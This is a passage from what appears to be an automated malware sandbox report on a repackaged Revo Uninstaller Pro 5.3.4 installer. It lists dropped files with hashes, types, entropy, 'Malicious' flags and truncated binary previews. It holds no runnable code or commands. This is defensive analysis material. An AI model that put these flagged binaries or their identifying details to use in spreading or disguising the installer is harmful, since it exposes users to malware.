                                                                                                                                                                          SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                                                                                                                                                          MD5:549EE11198143574F4D9953198A09FE8
                                                                                                                                                                          SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                                                                                                                                                          SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                                                                                                                                                          SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                          Entropy (8bit):5.804946284177748
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                                                          MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                                                          SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                                                          SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                                                          SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 150 x 57 x 24, resolution 2835 x 2835 px/m, cbSize 25818, bits offset 54
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25818
                                                                                                                                                                          Entropy (8bit):2.1654611461266877
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:qfsz6YadoZ+HPwmWxS04WKWEFCidDIaThy:q0zDadRPNW0CICiyaThy
                                                                                                                                                                          MD5:414D457C540048704D144FB2A0D2BC73
                                                                                                                                                                          SHA1:5021B23ABACB37EDC3E099132A9FF83A0AD5E3E9
                                                                                                                                                                          SHA-256:B0537E5F4FE7E8FAC0C093BFB83E7F633EF4F8DA6649F73329EA1B2777956DE2
                                                                                                                                                                          SHA-512:C1B90F31950F3AC5CD65BDDCFCAEFB4A722EC6F91327437734FE05C8989004F2268662DF5631FDB6A6F23E28080BABCBCFBBE112F0EBB3B850D17395484FF355
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM.d......6...(.......9.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):9728
                                                                                                                                                                          Entropy (8bit):5.157714967617029
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                                                                                                                                          MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                                                                                                                                          SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                                                                                                                                          SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                                                                                                                                          SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7168
                                                                                                                                                                          Entropy (8bit):5.295306975422517
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                                                                                                                                          MD5:11092C1D3FBB449A60695C44F9F3D183
                                                                                                                                                                          SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                                                                                                                                          SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                                                                                                                                          SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):174265447
                                                                                                                                                                          Entropy (8bit):6.912090216931223
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3145728:+tPWpEpfvoPWpEpOKKyPWpEpHldLPWpEpQ:+/vKKgldG
                                                                                                                                                                          MD5:A49C010EA61EBAC352464754FE53D710
                                                                                                                                                                          SHA1:A0023ABE96D6C4AB70EAE8BB51A88D1EFC841CB1
                                                                                                                                                                          SHA-256:4DDA9851A5EE98FEB3C219CBA4BF041A92E63AD9E514787D6CC21E0B9693BECA
                                                                                                                                                                          SHA-512:E43B163C0463966F53299CB74F035EB2BBEED92659A3BE1A66D25275DE893FF6CEAFC716F89EF328B21960D28242A25FD73C1029D8B3CF9E8AB2417617B42EDC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.1......,.......l........B..p...................B1......................................................z...........?.......................................................................................................................................................................G...X...............................................................................................................................................g.......................m.......................................j.......................m.......................................................................................................f...........O...]...._..................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                                                          File Type:OpenPGP Public Key
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):285348
                                                                                                                                                                          Entropy (8bit):5.023570673811003
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:PUuiSzFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:cR6FfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                                                          MD5:710A8AFD95641F3BED3A6C5326E16E9C
                                                                                                                                                                          SHA1:D0E6B03AC7220D70DAB93DD061ED7A2F39125D69
                                                                                                                                                                          SHA-256:3F64FAC5C5B6BB8E513B7139FA28663E8DBD0ECF9DB5267FD73C7720306005F7
                                                                                                                                                                          SHA-512:D108A118403C22FC55156075F3D5E48D99DDDE711FD993288197C99E8E997FA52862114BF43727F1A3A3C76837DE73FFED4C8A415879FDCDDFE995F0FA12FD15
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.p......,................A......._.......o......Pp.........................................................................."...................................................................................................................................................................................j.......................G...................................................................................................................%...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):244224
                                                                                                                                                                          Entropy (8bit):5.312608585453437
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:NFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:NFfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                                                          MD5:38F2B22967573A872426D05BDC1A1A70
                                                                                                                                                                          SHA1:ECAE471EB4E515E1006FCE645A82B70C8ACDA451
                                                                                                                                                                          SHA-256:83005624A3C515E8E4454A416693BA0FBF384FF5EA0E1471F520DFAE790D4AB7
                                                                                                                                                                          SHA-512:31BC78BB4EFC7C178C2C489B77D890B8806073180FBDD58156907C187CB73B0860701A9A2648DA1DA4930A8934C9A86B60EA5550315AFEBE833A681BCB4368E0
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..w...w...w...~.h.z...w...-...l(P.u...l(Q.v...l(`.v...l(a.v...l(f.v...Richw...................PE..L.....Eb...........!.....6...........C.......P...............................@............@.........................@`..l....X...........P...................0..L....................................................P...............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data...TX...p.......L..............@....rsrc....P.......R...\..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                          Entropy (8bit):5.804946284177748
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                                                          MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                                                          SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                                                          SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                                                          SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):14300
                                                                                                                                                                          Entropy (8bit):4.054813513864962
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:OIVC/0+JPRZPXiPyNhyv2wBApVYO8Ng8nVTN9QNuD8:TRUDSPyNhyv2wBApVYO8NJpN9QNuD8
                                                                                                                                                                          MD5:A22BD0673821CB37754076B1A0516C66
                                                                                                                                                                          SHA1:0B00E3C47A8A6B2141B7D11CD572996481B0D172
                                                                                                                                                                          SHA-256:289C1968EA37774DA100912E5C7D71AD6454292722F4152899DF0F87F9F9D2AE
                                                                                                                                                                          SHA-512:E3110784FD815E97EA95ED5F70B37CE6C8A84A22377FCC0A1BF4F93F2CCFC67B5F49A15E29A7EB0AB7CC8EC14C57B193182EB660E306C0A99AC6573539A9B02B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...@........H Wg.....................D.e....................d Wg.........E.e...........,........G.o.o.g.l.e. .C.h.r.o.m.e.........0.3...1.0...2.0.2.3........5C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e....*C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.....G.o.o.g.l.e. .C.h.r.o.m.e.....G.o.o.g.l.e. .L.L.C.....H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.....6.5.5...2.7. .M.B..D.(........".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.1.1.7...0...5.9.3.8...1.3.2.\.I.n.s.t.a.l.l.e.r.\.s.e.t.u.p...e.x.e.". .-.-.u.n.i.n.s.t.a.l.l. .-.-.c.h.a.n.n.e.l.=.s.t.a.b.l.e. .-.-.s.y.s.t.e.m.-.l.e.v.e.l. .-.-.v.e.r.b.o.s.e.-.l.o.g.g.i.n.g.....1.1.7...0...5.9.3.8...1.3.2............AS.O.F.T.W.A.R.E.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.C.u.r.r.e.n.t.V.e.r.s.i.o.n.\.U.n.i.n.s.t.a.l.l.\.G.o.o.g.l.e. .C.h.r.o.m.e....................../..........M.i.c.r.o.s.o.f.t. .E.d.g.e.....
                                                                                                                                                                          Process:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):322
                                                                                                                                                                          Entropy (8bit):5.164336901833222
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:qcdtvvjvAbIQ+q6s25YvtgEgXF1dkrCQHLBUwfjvAbIQ+q6s25YvtgEgXF1dkrCS:njvrvadft2XF1dkrCQHjvadft2XF1dkl
                                                                                                                                                                          MD5:8A248728B41394BB324D1D9CFC44819F
                                                                                                                                                                          SHA1:DA4829A2D50E4EA5650A971285A13E9CD7AB8F02
                                                                                                                                                                          SHA-256:0F02DF9B8CD720309A19EDCF74AEF9F98ED6B6B4119AA0206FF5F577F338A8BF
                                                                                                                                                                          SHA-512:336BA1CDEA89DFC1756BA3F50C3E77136B9128588960108098ACC4F8BD744A585A877A8D9D10931E67B7A7C3451C2FBCA1246A049AFC19A3C3F276E95842145C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[09.12.2024 11:53:03.0955] (VSProjectPro.cpp 501) --- Starting (v.5.3.4) --- cmd line = "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc..[09.12.2024 11:53:17.0279] (VSProjectPro.cpp 501) --- Starting (v.5.3.4) --- cmd line = "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"..
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6221
                                                                                                                                                                          Entropy (8bit):3.732253116120412
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:MppheZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:Mpphe4oAfcZLZcZL1
                                                                                                                                                                          MD5:F21D9CAD1CCE05F4E854AAF09D1E142C
                                                                                                                                                                          SHA1:772B73BF20E325DFC00D32F1F6393CC5B50C40E4
                                                                                                                                                                          SHA-256:D36764887F948DD1A5E98B45148179FAFD510154A633295C89BD2ECCE23668A4
                                                                                                                                                                          SHA-512:47269883A46E00BA10118287C8403C56A339C824284ACC82956055B2F3D1A0A8F0060641299D6672CA4752F34E2C68C030921E3C71DCC1560411024A8AAB4806
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....t!k.ZJ....d.ZJ......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^.Y......................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y....Programs..j......CW.^.Y......................@.....x...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^.Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6221
                                                                                                                                                                          Entropy (8bit):3.7327369289585453
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:MRphFZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:MRphF4oAfcZLZcZL1
                                                                                                                                                                          MD5:386DBC4C5744877132226A0E46DFB8B5
                                                                                                                                                                          SHA1:2C82A9C6FCBF3BA525FAD00A3BAE7C75BF1049F3
                                                                                                                                                                          SHA-256:9C37882AECABC10620771D8A094D004118A9708AA4D9609942A9F9292351935C
                                                                                                                                                                          SHA-512:106BF2A59E81D4A09AFCD7832B0992881799E6D7A81A69AF7BD055E1CD5D2775E9E7627AD233FA453F9E0AB1BE468B5C2A38A00B9A7845898F85BE5A0D0A0F94
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....t!k.ZJ..%..ZJ......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^.Y...............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^.Y......................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y....Programs..j......CW.^.Y......................@.....x...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^.Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6221
                                                                                                                                                                          Entropy (8bit):3.7331588122722503
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:MuphFZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:MuphF4oAfcZLZcZL1
                                                                                                                                                                          MD5:0EC491C41D4B065395C14A5BA488F682
                                                                                                                                                                          SHA1:5041AF0E4F0E497556B033C0DB5738F0BAD72759
                                                                                                                                                                          SHA-256:2DD83D2859E67F6E553BA06CFD39FE99C962BE1FDD424C9DE9EED30D0FA58A67
                                                                                                                                                                          SHA-512:17AF670DBEE99233BC96749E1D4A602ACBBED4E0DC7612451BA57094D9818D945FCDADCC0B1369D11BC0184378F19301847EAA5E6407A4D1B337C48EA8013818
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....t!k.ZJ...9..ZJ......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^.Y...............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^.Y......................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y....Programs..j......CW.^.Y......................@.....x...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^.Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6221
                                                                                                                                                                          Entropy (8bit):3.732253116120412
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:MppheZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:Mpphe4oAfcZLZcZL1
                                                                                                                                                                          MD5:F21D9CAD1CCE05F4E854AAF09D1E142C
                                                                                                                                                                          SHA1:772B73BF20E325DFC00D32F1F6393CC5B50C40E4
                                                                                                                                                                          SHA-256:D36764887F948DD1A5E98B45148179FAFD510154A633295C89BD2ECCE23668A4
                                                                                                                                                                          SHA-512:47269883A46E00BA10118287C8403C56A339C824284ACC82956055B2F3D1A0A8F0060641299D6672CA4752F34E2C68C030921E3C71DCC1560411024A8AAB4806
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....t!k.ZJ....d.ZJ......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^.Y......................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y....Programs..j......CW.^.Y......................@.....x...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^.Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6221
                                                                                                                                                                          Entropy (8bit):3.732253116120412
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:MppheZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:Mpphe4oAfcZLZcZL1
                                                                                                                                                                          MD5:F21D9CAD1CCE05F4E854AAF09D1E142C
                                                                                                                                                                          SHA1:772B73BF20E325DFC00D32F1F6393CC5B50C40E4
                                                                                                                                                                          SHA-256:D36764887F948DD1A5E98B45148179FAFD510154A633295C89BD2ECCE23668A4
                                                                                                                                                                          SHA-512:47269883A46E00BA10118287C8403C56A339C824284ACC82956055B2F3D1A0A8F0060641299D6672CA4752F34E2C68C030921E3C71DCC1560411024A8AAB4806
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....t!k.ZJ....d.ZJ......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^.Y......................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y....Programs..j......CW.^.Y......................@.....x...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^.Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6221
                                                                                                                                                                          Entropy (8bit):3.732253116120412
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:MppheZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:Mpphe4oAfcZLZcZL1
                                                                                                                                                                          MD5:F21D9CAD1CCE05F4E854AAF09D1E142C
                                                                                                                                                                          SHA1:772B73BF20E325DFC00D32F1F6393CC5B50C40E4
                                                                                                                                                                          SHA-256:D36764887F948DD1A5E98B45148179FAFD510154A633295C89BD2ECCE23668A4
                                                                                                                                                                          SHA-512:47269883A46E00BA10118287C8403C56A339C824284ACC82956055B2F3D1A0A8F0060641299D6672CA4752F34E2C68C030921E3C71DCC1560411024A8AAB4806
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....t!k.ZJ....d.ZJ......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y................................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^.Y......................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y....Programs..j......CW.^.Y......................@.....x...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^.Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
